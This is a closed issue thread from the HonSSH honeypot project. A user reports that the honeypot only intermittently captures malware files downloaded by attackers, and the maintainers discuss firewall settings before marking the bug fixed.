File download working intermittently

Question

File download working intermittently

Closed this issue 10 years ago · 10 comments

GoogleCodeExporter commented 10 years ago

What steps will reproduce the problem?
1. The attacker logs in and downloads a file.

What is the expected behavior?
All files that's downloaded to the honeypot are also downloaded by HonSSH

What do you see instead?
Only some files are downloaded, others are not.

What version of the product are you using?
56dfab7e24f1

On what operating system?
OpenBSD 5.3/5.4

Please provide any additional information below.
This is the first time i've noticed this. Two files were downloaded to the 
honeypot today, the only difference i can see between the two download events 
is the port the attacker connects to on the malware hosting server.
HTTP on port 6666 in this case. If this is the case its not consistent either 
as HonSSH has managed to do this before.

Adding log, adv-log and tty. Enjoy! :)

Original issue reported on code.google.com by are.hans...@gmail.com on 26 Mar 2014 at 10:32

Attachments:

202.146.217.84.tar.gz

Answer 1 · 2015-03-16T17:40:24.000Z

Original comment by tnn...@googlemail.com on 26 Mar 2014 at 10:36

Changed state: Accepted

Answer 2 · 2015-03-16T17:40:24.000Z

Bit worried about your .log file being so empty!

Original comment by tnn...@googlemail.com on 26 Mar 2014 at 10:43

Answer 3 · 2015-03-16T17:40:24.000Z

yepp, that is a bit concerning

Original comment by are.hans...@gmail.com on 26 Mar 2014 at 10:44

Answer 4 · 2015-03-16T17:40:25.000Z

Just looking into this and got a bit confused.

So the attacker downloads two files and honssh did not download any?

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 1:44

Answer 5 · 2015-03-16T17:40:25.000Z

As i recall the attacker downloaded two files, but HonSSH did not intercept any 
of them in this instance. It was able to intercept another file earlier the 
same day.

Dont have access to the machine atm, ill dig out some more info for you if you 
like.

Original comment by are.hans...@gmail.com on 30 Mar 2014 at 1:50

Answer 6 · 2015-03-16T17:40:25.000Z

Hmmm ok I understand :D

I just pasted the command into my test setup and it seems to catch and download 
it correctly. 
Any chance the firewall on the HonSSH box blocked port 6666 outbound (even when 
locally generated)?

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 1:56

Answer 7 · 2015-03-16T17:40:26.000Z

Hmmm....it's allowing tcp/6660-6669  from the honeynet.

It shouldn't block HonSSH from fetching files on the external interface, if 
that was the case I wouldn't see any downloads at all I think.

Sent from my Nokia 3310.

Original comment by are.hans...@gmail.com on 30 Mar 2014 at 2:02

Answer 8 · 2015-03-16T17:40:26.000Z

Ah yeah, that's true. I'll keep thinking.

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 2:04

Answer 9 · 2015-03-16T17:40:26.000Z

Original comment by tnn...@googlemail.com on 5 Apr 2014 at 4:37

Changed state: Started

Answer 10 · 2015-03-16T17:40:26.000Z

Hopefully it will catch all now. Raise another issue if not :)

Original comment by tnn...@googlemail.com on 6 Apr 2014 at 2:40

Changed state: Fixed